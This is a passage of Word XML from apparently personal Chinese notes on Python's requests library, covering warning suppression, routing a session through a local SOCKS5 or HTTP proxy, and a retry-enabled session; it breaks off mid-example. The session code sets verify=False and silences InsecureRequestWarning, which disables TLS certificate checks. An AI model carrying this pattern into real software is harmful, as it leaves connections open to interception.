          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pyecharts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="603"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA6BDEF" w14:textId="07BF46A9" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC4EF27" w14:textId="28109C0D" w:rsidR="007E6558" w:rsidRPr="007E6558" w:rsidRDefault="007E6558" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="604" w:name="_Toc159780037"/>
      <w:r>
        <w:t>requests</w:t>
      </w:r>
      <w:bookmarkEnd w:id="604"/>
    </w:p>
    <w:p w14:paraId="5006649C" w14:textId="203F67C8" w:rsidR="007E6558" w:rsidRDefault="00F45268" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="605" w:name="_Toc159780038"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭报错</w:t>
      </w:r>
      <w:bookmarkEnd w:id="605"/>
    </w:p>
    <w:p w14:paraId="3B7D1AF4" w14:textId="497FDE6D" w:rsidR="00F45268" w:rsidRDefault="00F45268" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F33C3B" w14:textId="43D38C25" w:rsidR="00FD1984" w:rsidRDefault="00B32EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开头加上如下的声明</w:t>
      </w:r>
      <w:r w:rsidR="00FD1984">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B43824" w14:textId="77777777" w:rsidR="00FD1984" w:rsidRDefault="00FD1984" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B78D628" w14:textId="77777777" w:rsidR="00B32EFC" w:rsidRDefault="00B32EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>import urllib3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC654B" w14:textId="77777777" w:rsidR="00B32EFC" w:rsidRDefault="00B32EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from urllib3.exceptions import InsecureRequestWarning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1786C0E5" w14:textId="77777777" w:rsidR="00B32EFC" w:rsidRDefault="00B32EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>urllib3.disable_warnings(InsecureRequestWarning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0DC745" w14:textId="27A2D215" w:rsidR="00F45268" w:rsidRDefault="00B32EFC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Insecure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA23285" w14:textId="3508300E" w:rsidR="00F45268" w:rsidRDefault="00F45268" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="162858BD" w14:textId="121F093C" w:rsidR="00B4309F" w:rsidRDefault="00B4309F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="606" w:name="_Toc159780039"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="606"/>
    </w:p>
    <w:p w14:paraId="66FDF0D3" w14:textId="370CB6A7" w:rsidR="00B4309F" w:rsidRDefault="00B4309F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A384818" w14:textId="77777777" w:rsidR="007D01A5" w:rsidRDefault="007D01A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    global session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C326656" w14:textId="77777777" w:rsidR="007D01A5" w:rsidRDefault="007D01A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session = rq.Session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248CABC3" w14:textId="77777777" w:rsidR="007D01A5" w:rsidRDefault="007D01A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session.timeout = 50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A62C5C" w14:textId="77777777" w:rsidR="007D01A5" w:rsidRDefault="007D01A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session.headers = headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59009B10" w14:textId="77777777" w:rsidR="007D01A5" w:rsidRDefault="007D01A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    session.verify=False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC80300" w14:textId="0749A642" w:rsidR="00B4309F" w:rsidRDefault="007D01A5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="007D01A5">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>session.proxies = {'https': 'socks5h://127.0.0.1:6679'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A983406" w14:textId="5C107DCE" w:rsidR="00B4309F" w:rsidRDefault="00B4309F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FB72771" w14:textId="4E3947A5" w:rsidR="00B4309F" w:rsidRDefault="00A200F5" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>679</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理，那么</w:t>
      </w:r>
      <w:r w:rsidR="00C52E2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00C52E2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C52E2F">
        <w:t>ocks5h</w:t>
      </w:r>
      <w:r w:rsidR="00C52E2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067E51BF" w14:textId="1BEA77B7" w:rsidR="00C52E2F" w:rsidRPr="007D01A5" w:rsidRDefault="00C52E2F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C52E2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00C52E2F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ocks5h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ysocks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBB905C" w14:textId="429E0B77" w:rsidR="00B4309F" w:rsidRDefault="00B4309F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442A9964" w14:textId="04C5133B" w:rsidR="00B4309F" w:rsidRDefault="007F7885" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，如果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理，那么就写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就行，如</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7885">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{'https': '</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7885">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7885">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>://127.0.0.1:6679'}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F7885">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{'http': '</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7885">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="007F7885">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>://127.0.0.1:6679'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335E592F" w14:textId="75740E46" w:rsidR="00B4309F" w:rsidRPr="007F7885" w:rsidRDefault="00724F74" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似这种例子，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以封装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议，反之亦可，不需要在代理协议上有无效的顾虑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16677D60" w14:textId="12CB6870" w:rsidR="00B4309F" w:rsidRDefault="00B4309F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16154181" w14:textId="0632AAE5" w:rsidR="0012018F" w:rsidRDefault="0012018F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="607" w:name="_Toc159780040"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置一个有重试、重连、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>retry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:bookmarkEnd w:id="607"/>
    </w:p>
    <w:p w14:paraId="3DDBAD8B" w14:textId="2F9D9041" w:rsidR="00B4309F" w:rsidRDefault="00B4309F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4041AEDA" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">requests.Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象本身没有内置的重试机制，但是你</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>库的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> urllib3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>库的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象来创建一个有重试机制的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DDC680" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0114E629" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象创建一个有重试机制的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115B6302" w14:textId="77777777" w:rsidR="0012170C" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F1F12B" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDF1F9" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from requests.adapters import HTTPAdapter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF8BC8A" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>from urllib3.util.retry import Retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2765E73B" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6487E5" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Session </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABE1E48" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>session = requests.Session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9C6B93" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD7C1D1" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933397B" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">retries = Retry(total=5,  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>最大重试次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30F342" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                backoff_factor=0.1,  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>指数退避因子，当设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时，表示在第</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>次重试之前等待</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"2^n * backoff_factor"</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>秒</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F10112" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                status_forcelist=[500, 502, 503, 504])  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对于这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>状态码，总是进行重试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2DE10" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67CDF370" w14:textId="77777777" w:rsidR="0012170C" w:rsidRPr="00B36C15" w:rsidRDefault="0012170C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTPAdapter </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象，并将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retry </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36C15">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象作为参数传入</w:t>
      </w:r>
    </w:p>
